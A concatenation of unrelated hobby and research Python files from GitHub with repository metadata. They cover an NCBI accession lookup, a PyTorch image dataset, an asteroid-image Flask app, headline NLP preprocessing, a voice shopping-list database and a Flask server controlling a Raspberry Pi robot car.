help="NCBI API Key"
)
parser.add_argument(
"--email",
type=str,
help="Entrez requires an email to connect to NCBI database. CPT Admin emails will be appended to list."
)
parser.add_argument(
"--wp_amt",
dest='wp_amt',
choices=('first','all'),
default='first',
)
parser.add_argument(
"--out_table",
type=argparse.FileType("w"),
default="_return_table.txt",
help="Output table consisting of accession data"
)
args = parser.parse_args()
# Get accessions from input file and/or text
accs = parse_inputs(args.wp_text,args.wp_file)
# Emails
emails = parse_email(args.email)
# Run functions
package = {
"email" : emails,
"db" : "nuccore",
"dbfrom" : "protein",
"api_key" : args.api_key,
}
wps = []
for acc in accs:
package["acc"] = acc
if args.wp_amt == 'all': # sorta a hacky way to check and see if we're grabbing first or all
wp_all = True
else:
wp_all = False
pacc, gacc, wp_amt = CPTLink(**package).map_accessions(wp_all)
current_wp = [pacc,gacc,wp_amt]
wps.append(current_wp)
write_table(wps,args.out_table)
| TAMU-CPT/galaxy-tools | tools/wp_analysis/wp_data.py | wp_data.py | py | 3,447 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "re.search",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "argparse.FileType... |
20844744315 | import os
import random
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
class Images(Dataset):
    """Folder-backed image dataset yielding RGB crop tensors in [0, 1]."""
    def __init__(self, folder, size, is_training, downsample=False, preload=False):
        """
        I assume that all images in the
        folder have size at least `size`.
        Arguments:
            folder: a string, the path to a folder with images.
            size: an integer.
            is_training: a boolean.
            downsample: a boolean.
            preload: a boolean.
        """
        self.names = os.listdir(folder)
        self.folder = folder
        self.downsample = downsample
        self.preload = preload
        self.size = size
        if is_training:
            # Training: random crop plus flip augmentations.
            self.transform = transforms.Compose([
                transforms.RandomCrop(size),
                transforms.RandomVerticalFlip(),
                transforms.RandomHorizontalFlip(),
                transforms.ToTensor()
            ])
        else:
            # Evaluation: deterministic center crop only.
            self.transform = transforms.Compose([
                transforms.CenterCrop(size),
                transforms.ToTensor()
            ])
        if preload:
            # load all images into the memory
            self.images = []
            for i in range(len(self)):
                image = self.load(i)
                self.images.append(image)
    def __len__(self):
        return len(self.names)
    def __getitem__(self, i):
        """
        Returns:
            a float tensor with shape [3, size, size].
            It represents a RGB image with
            pixel values in [0, 1] range.
        """
        image = self.images[i] if self.preload else self.load(i)
        if self.downsample:
            # Randomly shrink by factor 1/2/3, but only when the reduced
            # image still fits the crop size.
            r = random.choice([1, 2, 3])
            w, h = image.size
            w, h = w // r, h // r
            if r > 1 and w >= self.size and h >= self.size:
                image = image.resize((w, h), Image.LANCZOS)
        return self.transform(image)
    def load(self, i):
        # Decode image i from disk, forcing RGB mode.
        name = self.names[i]
        path = os.path.join(self.folder, name)
        image = Image.open(path).convert('RGB')
        return image
| TropComplique/SRFeat-pytorch | input_pipeline.py | input_pipeline.py | py | 2,160 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "os.listdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "tor... |
31406415884 | '''
Emily Lee
SoftDev1 pd6
K#25 -- Getting More REST
2018-11-15
'''
import json
import urllib.request
from flask import Flask,render_template
app=Flask(__name__)
@app.route("/")
def Hello_world():
url_stub="http://www.asterank.com/api/skymorph/search?target="
target="J99TS7A"
req=urllib.request.urlopen(url_stub+target)
fin=json.loads(req.read())
key=fin["results"][0]["key"]
url_stub="http://www.asterank.com/api/skymorph/image?key="
return render_template("index.html",
url=url_stub+key)
if __name__=="__main__":
app.debug=True
app.run()
| ecrystale/leeE | 25_rest/app.py | app.py | py | 628 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "urllib.request.request.urlopen",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name":... |
23308286546 | import stanza
from headline_retriever import load_articles, collect_articles, save_articles
from textblob import TextBlob
from datetime import date
NLP = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos,lemma,ner')
END_DATE = date(2020, 3, 27) # the chosen last day to retrieve article headlines
# in place modification of a list of article dictionaries
def pre_process(articles):
    """Annotate each article dict in place with NLP features.

    Adds TextBlob sentiment plus Stanza-derived words, lemmas, POS tags
    and named-entity dicts computed from the article's 'headline' field.
    """
    for article in articles:
        headline = article['headline']
        sentiment = TextBlob(headline).sentiment
        # print("sentiment:", sentiment)
        sentiment_polarity = sentiment[0] # range from -1 to 1. -1 being the most negative, 1 being the most positive
        sentiment_subjectivity = sentiment[1] # range from 0 to 1. 0 being factual, 1 being an opinion
        processed_headline = NLP(headline)
        words = []
        lemmas = []
        pos = []
        entities = processed_headline.entities
        entity_dicts = []
        # Flatten Stanza entity objects into plain serialisable dicts.
        for entity in entities:
            entity_dict = dict()
            entity_dict['text'] = entity.text
            entity_dict['type'] = entity.type
            entity_dict['start_char'] = entity.start_char
            entity_dict['end_char'] = entity.end_char
            entity_dicts.append(entity_dict)
        # Collect token-level text/lemma/POS across all sentences.
        for sentence in processed_headline.sentences:
            for word in sentence.words:
                words.append(word.text)
                lemmas.append(word.lemma)
                pos.append(word.pos)
        article['sentiment_polarity'] = sentiment_polarity
        article['sentiment_subjectivity'] = sentiment_subjectivity
        article['words'] = words
        article['lemmas'] = lemmas
        article['pos'] = pos
        article['entities'] = entity_dicts
def average_sentiments(preprocessed_articles):
    """Print the mean sentiment polarity and subjectivity of the articles.

    Prints zeros for an empty list instead of dividing by zero.
    """
    if not preprocessed_articles:
        print("avg polarity:", 0)
        print("avg subjectivity:", 0)
        return
    count = len(preprocessed_articles)
    polarity_sum = sum(a['sentiment_polarity'] for a in preprocessed_articles)
    subjectivity_sum = sum(a['sentiment_subjectivity'] for a in preprocessed_articles)
    print("avg polarity:", polarity_sum / count)
    print("avg subjectivity:", subjectivity_sum / count)
def average_words_per_headline(preprocessed_articles):
    """Print the mean whitespace-separated word count of the headlines.

    Mirrors average_sentiments: prints 0 for an empty list instead of
    raising ZeroDivisionError (the original crashed on empty input).
    """
    if not preprocessed_articles:
        print("avg words:", 0)
        return
    total_words = sum(len(a['headline'].split()) for a in preprocessed_articles)
    print("avg words:", total_words / len(preprocessed_articles))
if __name__ == "__main__":
pass
#Example commands contained below:
# attempt to load in the article data if it exists
# fox_articles = load_articles("foxnews_headlines")
# msnbc_articles = load_articles("msnbc_headlines")
# pre_process(fox_articles)
# pre_process(msnbc_articles)
# save the retrieved article data
# save_articles("foxnews_pre_processed", fox_articles)
# save_articles("msnbc_pre_processed", msnbc_articles)
| NoahBlume/nlp_project | pre_processor.py | pre_processor.py | py | 2,997 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "stanza.Pipeline",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "textblob.TextBlob",
"line_number": 16,
"usage_type": "call"
}
] |
15826756401 | import pandas, main
from db import db
from config import Style
def add_item_to_list():
    """Voice-driven loop that inserts new items into the shopping_list table.

    Asks for an item name and category, inserts the row, then asks whether
    to add another; repeats until the user answers "no".
    """
    while True:
        conn = db.create_connection()
        cursor = conn.cursor()
        main.speak("What is the name of the Item?")
        item = main.listen().capitalize()
        main.speak("What is the category of the item?")
        category = main.listen().capitalize()
        # Parameterized query: never interpolate spoken input into the SQL
        # string (injection risk, and any apostrophe broke the statement).
        # Assumes sqlite3-style "?" placeholders — confirm the db backend.
        cursor.execute(
            "INSERT INTO shopping_list (Item, Category) VALUES (?, ?);",
            (item, category),
        )
        conn.commit()
        print("Item added to list.")
        main.speak("Item added to shopping list.")
        main.speak("Would you like to add another item?")
        run_again = main.listen().lower()
        while run_again not in ("yes", "no"):
            main.speak("Please say yes or no.")
            main.speak("Would you like to add another item?")
            run_again = main.listen().lower()
        if run_again == "no":
            break
        # "yes": loop again. The original recursed into add_item_to_list()
        # here, growing the call stack and re-entering the outer loop once
        # the recursive call returned.
def update_item_in_list():
    """Voice-driven update of one row's Item or Category in shopping_list."""
    while True:
        conn = db.create_connection()
        cursor = conn.cursor()
        print(pandas.read_sql_query("SELECT * from shopping_list", conn))
        shop = cursor.execute("SELECT * from shopping_list;")
        for item in shop:
            main.speak(f"Item ID: {item[0]} Item: {item[1]}")
        main.speak("What is the I.D. of the item?")
        update_item = main.listen()
        # Parameterized query instead of f-string interpolation (injection
        # risk). Assumes sqlite3-style "?" placeholders — confirm backend.
        cursor.execute("SELECT * FROM shopping_list WHERE ItemID = ?;", (update_item,))
        # fetchone() yields the single matching row. The original used
        # fetchall() and indexed the *list of rows* as if it were a row, so
        # result[1] was the second row of the table, not the Item column.
        result = cursor.fetchone()
        main.speak("Would you like to update the Item or the Category?")
        choice = main.listen().upper()
        while choice not in ('ITEM', 'CATEGORY'):
            main.speak("Please state if you would like to update the Item or the Category.")
            print("Please select 'ITEM' or 'CATEGORY'")
            choice = main.listen().upper()
        if choice == "ITEM":
            main.speak("What is the new name for the item?")
            ITEM = main.listen().capitalize()
            CATEGORY = result[2]
        else:  # choice == "CATEGORY"
            ITEM = result[1]
            main.speak(f"What is the new category for the item {ITEM}")
            CATEGORY = main.listen().capitalize()
        cursor.execute(
            "UPDATE shopping_list SET Item = ?, Category = ? WHERE ItemID = ?;",
            (ITEM, CATEGORY, update_item),
        )
        conn.commit()
        print("Item updated.")
        main.speak("Item updated.")
        break
def delete_item_from_list():
    """Voice-driven deletion of one row from shopping_list by ItemID."""
    while True:
        conn = db.create_connection()
        cursor = conn.cursor()
        print(pandas.read_sql_query("SELECT * from shopping_list", conn))
        shop = cursor.execute("SELECT * from shopping_list;")
        for item in shop:
            main.speak(f"Item ID: {item[0]} Item: {item[1]}")
        main.speak("What is the I.D. of the item?")
        update_item = main.listen()
        # Parameterized query: never interpolate the spoken id into the SQL
        # string (injection risk). Assumes sqlite3-style "?" placeholders —
        # confirm the db backend.
        cursor.execute("DELETE FROM shopping_list WHERE ItemID = ?;", (update_item,))
        conn.commit()
        print("Item deleted")
        main.speak("Item deleted.")
        break
def get_shopping_list():
    """Read every row of shopping_list, print it in color and speak it."""
    conn = db.create_connection()
    cursor = conn.cursor()
    rows = cursor.execute("SELECT * from shopping_list;").fetchall()
    if not rows:
        print("No items in list")
        main.speak("There are no items in the shopping list.")
        return
    for row in rows:
        print(f"{Style.YELLOW}ITEM:{Style.RESET} {row[1]} {Style.YELLOW}CATEGORY:{Style.RESET} {row[2]}")
        main.speak(f"Item: {row[1]} Category: {row[2]}")
{
"api_name": "db.db.create_connection",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "db.db",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "main.speak",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "main.listen",
"line_number... |
73632775228 | # dependencies module
from crypt import methods
import inspect, ctypes, os, socket
from logging import shutdown
import cv2 as CV
from threading import Thread
from dotenv import load_dotenv
from flask import Flask, render_template, request, Response, make_response, jsonify
from random import randint as rand
from flask_socketio import SocketIO, emit
from time import sleep
from datetime import datetime
from newstream import Camera as cam
# modules I have created
from Python.Sensors import *
from Python.sendEmail import sendMail
from Python.ReadVoltages import Adc
from Python.Buzzer import buzzer
from Python.Ultrasonic import Ultrasonic as lt
# Freenove modules but i modified them more explanation are givin on week Five
# https://securityguardjohnmuller.netlify.app/#weekNumFive
# the original code is on
# https://github.com/Freenove/Freenove_4WD_Smart_Car_Kit_for_Raspberry_Pi
from Python.Motor import Motor
from Python.servo import Servo
from Python.led import Led
from Python.Video import VideoStreaming
# create new instance of modules
wheelMotor = Motor()
servoMotor = Servo()
lineTracking = LineTracking()
lightTracking = Light()
batteryInfo = Adc()
newLed = Led()
lightTracking = Light()
ultrasonicSensor = Ultrasonic()
newLineTracking = LineTracking()
videoCapture = CV.VideoCapture(0)
newUltraSonic = lt
# get environment variables
load_dotenv()
serverEmail = os.getenv("ADMIN_EMAIL")
serverPassword = os.getenv("ADMIN_PASSWORD")
# initial and declare variables
maxServoValue = 180
minServoValue = 0
userName = None
serverThreads = []
LEDsThreads = []
sensorsThreads = []
socketConnection = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
socketConnection.connect(("1.1.1.1", 0))
IPAddress = socketConnection.getsockname()[0]
receiverEmailAddress = "Godsaveme2001@gmail.com"
# this this variable changes when the page loads first time and send an email before its status changes
# the reason if it so it send an email when the server starts but not on every re/load
serverHasStarted = os.getenv("serverHasStarted")
pageAlreadyAccessedStarted = os.getenv("pageAlreadyAccessedStarted")
objectsDistance = 0
rightSensorReadings = 0
leftSensorReadings = 0
# get current time for email status
currentTime = datetime.now().strftime("%H:%M:%S")
currentDate = datetime.now().date()
def Color(red, green, blue, white=0):
    """Pack 8-bit color components into a single integer color value.

    Each component is expected in the range 0-255, where 0 is the lowest
    intensity and 255 the highest. The white channel occupies the top
    byte, followed by red, green, and blue in descending significance.

    Args:
        red (int): red component, 0-255.
        green (int): green component, 0-255.
        blue (int): blue component, 0-255.
        white (int, optional): white component, 0-255. Defaults to 0.

    Returns:
        int: packed 24-bit (or 32-bit with white) color value.
    """
    packed = white << 24
    packed |= red << 16
    packed |= green << 8
    packed |= blue
    return packed
def asyncRaise(thread, executeType):
    """Asynchronously raise an exception inside another thread.

    Uses the CPython C API ``PyThreadState_SetAsyncExc``, which schedules
    *executeType* to be raised the next time the target thread executes
    bytecode. Used here to stop the endless background loops.

    Args:
        thread (int): the target thread's identifier (``Thread.ident``).
        executeType (type | BaseException): exception class to inject; an
            instance is replaced by its class, since the C API requires a
            class object.

    Raises:
        ValueError: if no thread with that id exists (result == 0).
        SystemError: if the call affected more than one thread state; the
            injection is undone by re-calling with NULL before raising.
    """
    threadIndent = ctypes.c_long(thread)
    if not inspect.isclass(executeType):
        executeType = type(executeType)
    result = ctypes.pythonapi.PyThreadState_SetAsyncExc(
        threadIndent, ctypes.py_object(executeType)
    )
    if result == 0:
        raise ValueError("invalid thread id")
    elif result != 1:
        # More than one thread state was modified: revert by sending NULL.
        ctypes.pythonapi.PyThreadState_SetAsyncExc(threadIndent, None)
        raise SystemError("PyThreadState_SetAsyncExc failed")
def killThread(Threads):
    """Stop every thread in *Threads* and remove it from the list.

    Iterates over a snapshot of the list: the original looped over the
    same list it was calling ``remove`` on, which shifts the remaining
    elements and skips every other thread.

    Args:
        Threads (list): list of threading.Thread objects to stop.
    """
    for thread in list(Threads):
        try:
            asyncRaise(thread.ident, SystemExit)
            Threads.remove(thread)
            print(f"{thread} has been stopped")  # for testing purposes
        except ValueError as error:
            print(f"an error occur : \n{error}")
def getTemperature():
    """Read the Raspberry Pi CPU temperature via vcgencmd.

    Returns:
        str: the temperature value, e.g. "48.3", sliced out of vcgencmd's
        "temp=48.3'C" output (drops the "temp=" prefix and "'C\\n" tail).
    """
    raw = os.popen("/opt/vc/bin/vcgencmd measure_temp").read()
    return format(raw[5:-3])
def getBatteryPercentage():
    """Read the battery voltage from the ADC and return it as a percentage.

    Returns:
        int: battery charge estimate in percent.
    """
    reading = batteryInfo.recvADC(2)
    # Empirical scaling used by this kit (voltage / 1.4 * 30) —
    # TODO(review): confirm the divider math against the hardware docs.
    percentage = reading / 1.4 * 30
    print(percentage)
    return int(percentage)
def colorAnimation(MODE="string"):
    """Run the LED animation matching *MODE* in an endless loop.

    Intended to run on a background thread, e.g.::

        thread = Thread(target=colorAnimation, args=("RGB",))
        thread.start()

    Supported MODEs and their handlers:
        "RGB"       -> newLed.customRGB
        "Random"    -> newLed.customRandomAnimation
        "Cycle"     -> newLed.rainbowCycle
        "Rainbow"   -> newLed.rainbow
        "Animation" -> newLed.theaterChaseRainbow
    Any other value prints a notice and returns immediately.
    """
    # NOTE(review): the original ran rainbowCycle for "Random" and
    # customRandomAnimation for "Cycle" — the handlers were swapped
    # relative to their names; they are matched up here.
    animations = {
        "RGB": newLed.customRGB,
        "Random": newLed.customRandomAnimation,
        "Cycle": newLed.rainbowCycle,
        "Rainbow": newLed.rainbow,
        "Animation": newLed.theaterChaseRainbow,
    }
    animation = animations.get(MODE)
    if animation is None:
        print("not supported mode")
        return None
    while True:
        animation(newLed.strip)
def ultrasonicBackground():
    """Background polling loop: publish the latest ultrasonic distance.

    Runs forever on a worker thread (see ``ultrasonicThread`` below) and
    refreshes the module-level ``objectsDistance`` twice per second;
    readers simply consume the global.
    """
    global objectsDistance
    while True:
        objectsDistance = ultrasonicSensor.getDistance()
        sleep(0.5)
# declare a thread and append it to threads list
ultrasonicThread = Thread(target=ultrasonicBackground)
serverThreads.append(ultrasonicThread)
sensorsThreads.append(ultrasonicThread)
def lightSensorReadingsBackground():
    """Background polling loop: publish the photoresistor readings.

    Runs forever on a worker thread (see ``lightSensorsThread`` below),
    refreshing the module-level ``leftSensorReadings`` and
    ``rightSensorReadings`` from ADC channels 0 and 2 twice per second.
    """
    global leftSensorReadings
    global rightSensorReadings
    while True:
        leftSensorReadings = batteryInfo.recvPCF8591(0)
        rightSensorReadings = batteryInfo.recvPCF8591(2)
        sleep(0.5)
        # print(leftSensorReadings, rightSensorReadings) # for testing purposes
# declare a thread and append it to threads list
lightSensorsThread = Thread(target=lightSensorReadingsBackground)
serverThreads.append(lightSensorsThread)
sensorsThreads.append(lightSensorsThread)
# destroy all components and send an email
def destroy(Error, shutDown=False):
    """Reset all hardware to a safe state, notify by email, then exit.

    Args:
        Error (str | Exception | None): when not None, an "unexpected
            error" email including the error text is sent; when None, a
            plain "server went down" email is sent instead.
        shutDown (bool): when True, power the Raspberry Pi off after
            cleanup.
    """
    if Error is not None:
        messageSubject = "an error occur"
        messageBody = (
            f"unexpected error occur cause the server to shutdown at "
            f"{currentTime}\nThe error was\n{Error}"
        )
    else:
        messageSubject = "Server went down"
        # The original appended {Error} here too, which rendered the
        # literal text "None" at the end of the manual-shutdown message.
        messageBody = f"server shutdown manually at {currentTime} all looks good!"
    # send email with server status
    sendMail(
        subject=messageSubject,
        receiver=receiverEmailAddress,
        body=messageBody,
        email=serverEmail,
        password=serverPassword,
    )
    # give the mail call a moment to complete before tearing hardware down
    sleep(1)
    # stop all wheels
    wheelMotor.setMotorModel(0, 0, 0, 0)
    # centre both camera servos (address "1" = up/down, "0" = left/right)
    servoMotor.setServoPwm("1", 90)
    servoMotor.setServoPwm("0", 90)
    # turn buzzer off
    buzzer(False, False, False)
    # reset the environment flags to their default values
    os.environ["pageAlreadyAccessedStarted"] = "False"
    os.environ["serverHasStarted"] = "False"
    # destroy / turn off the LEDs
    newLed.colorWipe(newLed.strip, Color(0, 0, 0), 10)
    # make sure that all background threads are exited / stopped
    killThread(serverThreads)
    # wait 1 second to make sure that all threads have stopped
    sleep(1)
    # if shutdown requested by the user, power the machine off
    if shutDown:
        os.system("sudo shutdown now")
    # then exit / close the programme
    exit()
try:
# setting flask server as a single module by setting __name__
# setting template and statics folder so flask sever knows where to look for resources
app = Flask(__name__, template_folder="Templates", static_folder="Static")
# socketio = SocketIO(app, async_mode=None)
# when server starts send an email with it's current ip address
if serverHasStarted == "False":
# for testing purposes
print("Server Running... ")
# to let the user knows that server has started
for _ in range(4):
# turn buzzer on
buzzer(status=True)
newLed.colorWipe(255.166, 99)
buzzer(status=False)
sleep(0.25)
newLed.colorWipe(0.0, 0)
sendMail(
subject="Server has started",
receiver=receiverEmailAddress,
body=f"""Hey, this is the smart car auto mail system\nThe Server has started running on http://{IPAddress}:5500/\nat {currentTime} - {currentDate} everything looks fine! """,
password=serverPassword,
email=serverEmail,
)
os.environ["serverHasStarted"] = "True"
# when host is loaded return to app page index
# and receive data from it
@app.route("/", methods=["POST", "GET"])
def index():
global userName
# credentials = request.get_data()
# password == credentials["password"]
# email == credentials["email"]
# if password == os.environ[str(password)] and email == os.environ[str(email)]
# userName = os.environ[str(email) + "userName"]
# if page is not accessed after server has started running send an email
if pageAlreadyAccessedStarted == "False":
sendMail(
subject="Server has accessed",
receiver=receiverEmailAddress,
body=f"Hey, this is the smart car auto mail system\nThe Server has accessed at {currentTime} by {userName} \n everything looks fine! ",
password=serverPassword,
email=serverEmail,
)
# change the env value
os.environ["pageAlreadyAccessedStarted"] = "True"
return render_template("app.html")
# send CPU and power data to the client
# get other objects distance
@app.route("/data/<type>")
def sendData(type):
userName = " John Muller"
data = {
"username": userName,
"Temperature": getTemperature(), # CPU Temperature
"power": getBatteryPercentage(), # Battery info
"dataDistance": objectsDistance,
"roomTemperature": rand(0, 150),
}
if type == "All":
response = make_response(jsonify(data))
return response
elif type == "Light":
lightSensorData = data["rightSensorReadings": rightSensorReadings,
"leftSensorReadings": leftSensorReadings]
# start reading light distance
lightSensorsThread.start()
lightSensorsThread.join()
response = make_response(jsonify(lightSensorData))
return response
elif type == "distance":
# start reading objects distance
ultrasonicThread.start()
ultrasonicThread.join()
else:
# stopping only these two
killThread(sensorsThreads)
return render_template("app.html")
    def captureAnImage():
        """Endless generator yielding camera frames for an MJPEG stream.

        Grabs a frame, snapshots it to pic.jpg in the working directory,
        then yields the frame wrapped in multipart/x-mixed-replace
        boundaries for the Flask Response below.

        Yields:
            bytes: one JPEG frame framed by the "--frame" boundary.
        """
        while True:
            frame = cam.get_frame()
            # NOTE(review): frame is concatenated with bytes below, so
            # get_frame() presumably returns encoded JPEG bytes; if so,
            # cv2.imwrite here would expect an image array instead —
            # confirm the Camera.get_frame contract.
            CV.imwrite("pic.jpg", frame)
            yield (
                b"--frame\r\n"
                b"Content-Type: image/jpeg\r\n\r\n" + frame + b"\r\n"
            )
    @app.route("/videoStream")
    def videoStream():
        """Stream the camera feed as a multipart MJPEG HTTP response."""
        return Response(
            captureAnImage(), mimetype="multipart/x-mixed-replace; boundary=frame"
        )
# wheel directions and buzzer route
# this route is created to move the car according to the requested value
@app.route("/wheel/<direction>")
# create a function that checks the direction and call wheelMotor function
# to set the wheels and move the car according the given direction
def wheelDirections(direction):
# wheel button is clicked in the frontend (user's interface)
# Do the following
# if objectsDistance >= 20:
# if direction is set to forward
if direction == "forward":
# moving the car forward
# set all wheels value negative so the car moves forward
wheelMotor.setMotorModel(-2000, -2000, -2000, -2000)
# the below function is { return render_template("app.html")} doing nothing in this case
# because in the front end i am not sending request to get new page so the page
# do not refresh
# i just did it so it does not give an error
# also if the user hit to the directory for example host/wheel/forward the flask server will
# redirecting the user to app page but the wheel will keep running and that what wheel happen if i sent
# GET request like "host/wheel/forward"
# i can return none but the flask server will give a warning
# and if i return text like "car is moving forward" it will go to a new page showing the text and it's not
# effecting way
# more explanation are given on week four "https://securityguardjohnmuller.netlify.app/#weekNumFour"
return render_template("app.html")
# if direction is set to backward
elif direction == "backward":
# moving the car forward
# set all wheels value positive so the car moves backward
wheelMotor.setMotorModel(2000, 2000, 2000, 2000)
return render_template("app.html")
# if direction is set to left
elif direction == "left":
# turning the car to the left
# set the left wheels value positive and lower than the right wheels so the car turn to the left
wheelMotor.setMotorModel(-1500, -1500, 1500, 1500)
return render_template("app.html")
# if direction is set to right
elif direction == "right":
# turning the car to the left
# set the right wheels value negative and lower than the left wheels so the car turn to the right
wheelMotor.setMotorModel(1500, 1500, -1500, -1500)
return render_template("app.html")
# if direction is set to buzzer
elif direction == "buzzer":
# turn buzzer on
buzzer(True)
return render_template("app.html")
# if direction is set to stop or anything else
else:
# make sure that wheels are set to zero
wheelMotor.setMotorModel(0, 0, 0, 0)
# and buzzer is turned on
buzzer(False)
# if the user hard coded a the url for example host/wheel/example
# but in my case i am sending stop when button reveals or not clicked
# more explanation are given on week four "https://securityguardjohnmuller.netlify.app/#weekNumFour"
return "invalid request"
# else:
# wheelMotor.setMotorModel(0, 0, 0, 0)
# buzzer(False)
# return render_template("app.html")
# servo directions route
@app.route("/servo/<directionURL>", methods=["POST"])
def servoDirections(directionURL):
# get value from the clint side and store it in a variable
currentDirectionValue = request.get_json()
# print(currentDirectionValue) # for testing purposes
if (
# check if the current value is between the minimum and maximum value
# if value is not in between min and max the function will return invalid request
# the below code is to double check so if someone has make changes on the clint side it won't effect in her
currentDirectionValue >= minServoValue
and currentDirectionValue <= maxServoValue
):
# the upper (left right)servo motor has address is 0
# the bottom (up and down ) servo motor has address 1
# if direction url is "example" will move to it's given direction
if directionURL == "up":
servoMotor.setServoPwm("1", currentDirectionValue)
return render_template("app.html")
elif directionURL == "right":
servoMotor.setServoPwm("0", currentDirectionValue)
return render_template("app.html")
elif directionURL == "down":
servoMotor.setServoPwm("1", currentDirectionValue)
return render_template("app.html")
elif directionURL == "left":
servoMotor.setServoPwm("0", currentDirectionValue)
return render_template("app.html")
else:
servoMotor.setServoPwm("1", 90)
servoMotor.setServoPwm("0", 90)
return render_template("app.html")
else:
return "invalid request please try again "
# send Email Route
@app.route("/Email/<Type>", methods=["POST", "GET"])
def sendEmail(Type):
# when user press on send email if method equal to "POST"
# the data will be sent to the given gmail with it's body
# but the subject is initialed in here
if Type == "POST":
data = request.get_json()
sendMail(
subject="Smart car mail system",
receiver=data["receiver"],
body=data["body"],
password=serverPassword,
email=serverEmail,
)
# if method == "GET" then the system summary message will be sent
elif Type == "GET":
sendMail(
subject="Smart car summary",
receiver=receiverEmailAddress,
body=f"""Hey, this is the smart car auto mail system\n
everything looks fine!{currentTime}\n
one accessed user: {userName}\n
everything looks fine!""",
password=serverPassword,
email=serverEmail,
attachment=True,
)
# LEDs route
@app.route("/LEDs/<stripType>/<LEDStatus>", methods=["POST", "GET"])
def LEDs(stripType, LEDStatus):
if stripType != "single":
# make sure that the animation Mode is switched off
killThread(LEDsThreads)
# make sure that the all LEDs are switched off
sleep(0.5)
newLed.colorWipe(newLed.strip, Color(0, 0, 0), 10)
if stripType == "RGB" and LEDStatus == "on":
RGBModeThread = Thread(target=colorAnimation, args=("RGB",))
serverThreads.append(RGBModeThread)
LEDsThreads.append(RGBModeThread)
print(
"RGB animation mode thread has started!.."
) # for testing purposes
RGBModeThread.start()
elif stripType == "chaserAnimation" and LEDStatus == "on":
theaterChaseRainbow = Thread(target=colorAnimation, args=("Animation",))
serverThreads.append(theaterChaseRainbow)
LEDsThreads.append(theaterChaseRainbow)
print(
"Chaser animation mode thread has started!.."
) # for testing purposes
theaterChaseRainbow.start()
elif stripType == "rainbow" and LEDStatus == "on":
rainbow = Thread(target=colorAnimation, args=("Rainbow",))
serverThreads.append(rainbow)
LEDsThreads.append(rainbow)
print(
"Rainbow animation mode thread has started!.."
) # for testing purposes
rainbow.start()
elif stripType == "cycle" and LEDStatus == "on":
rainbowCycle = Thread(target=colorAnimation, args=("Cycle",))
serverThreads.append(rainbowCycle)
LEDsThreads.append(rainbowCycle)
print(
"Cycle animation mode thread has started!.."
) # for testing purposes
rainbowCycle.start()
elif stripType == "randomColors" and LEDStatus == "on":
randomAnimation = Thread(target=colorAnimation, args=("Random",))
serverThreads.append(randomAnimation)
LEDsThreads.append(randomAnimation)
print(
"Cycle animation mode thread has started!.."
) # for testing purposes
randomAnimation.start()
return render_template("app.html")
elif stripType == "single" and LEDStatus == "on":
data = request.get_json()
print(data) # for testing purposes
index = int(data["index"])
RGB = data["RGB"]
print(f"type of {index} is {type(index)}") # for testing purposes
newLed.ledIndex(index, RGB["R"], RGB["G"], RGB["B"])
return render_template("app.html")
elif stripType == "single" and LEDStatus == "off":
data = request.get_json()
index = int(data["index"])
newLed.ledIndex(index, 0, 0, 0)
return render_template("app.html")
else:
# destroy / turn off the LEDs
killThread(LEDsThreads) # to kill the thread
# to make sure that all LEDs are low / turned off
return "invalid request"
# Sensor mode route
@app.route("/sensor/<sensorType>/<modeStatus>")
def sensors(sensorType, modeStatus):
if modeStatus == "start":
# make sure that the previous modes / threads has been stopped
killThread(sensorsThreads)
# also make sure that wheels are set to 0 if the thread exited and the pins are set to high
wheelMotor.setMotorModel(0, 0, 0, 0)
if sensorType == "ultraSonic":
ultrasonicModeThread = Thread(target=newUltraSonic.run)
sensorsThreads.append(ultrasonicModeThread)
serverThreads.append(ultrasonicModeThread)
print("ultrasonic mode thread has started!...") # for testing purposes
ultrasonicModeThread.start()
return render_template("app.html")
elif sensorType == "lineTracking":
lineTrackingModeThread = Thread(target=newLineTracking.run)
sensorsThreads.append(lineTrackingModeThread)
serverThreads.append(lineTrackingModeThread)
print(
"line tracking mode thread has started!..."
) # for testing purposes
lineTrackingModeThread.start()
return render_template("app.html")
elif sensorType == "lightTracking":
lightTrackingModeThread = Thread(target=lightTracking.run)
sensorsThreads.append(lightTrackingModeThread)
serverThreads.append(lightTrackingModeThread)
lightTrackingModeThread.start()
return render_template("app.html")
elif sensorType == "faceTracking1":
# TODO this code not ready because i am waiting for the camera
faceTrackingModeThread = Thread(target=VideoStreaming.face_detect.run)
sensorsThreads.append(faceTrackingModeThread)
serverThreads.append(faceTrackingModeThread)
faceTrackingModeThread.start()
return render_template("app.html")
else:
killThread(sensorsThreads)
return render_template("app.html")
    # if user press on close button and confirm that they sure
    # close server
    @app.route("/server/disconnect")
    def shutServerDown():
        """Cleanly shut the whole system down at the user's request."""
        destroy(Error=None, shutDown=True)
        # destroy() never returns (it calls exit()), but Flask still wants
        # a return statement here to satisfy the view contract.
        return "System went down "
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=5500, threaded=True)
except Exception as errorException:
print("an error occurred\n", errorException) # for testing purposes
buzzer(
status=True, anErrorOccur=True
) # to let the user know that there is an error
destroy(errorException) # make sure that all components are set to low/destroyed
except KeyboardInterrupt:
print("Keyboard Interrupt") # for testing purposes
destroy(None)
finally:
print("finally") # for testing purposes
destroy(None)
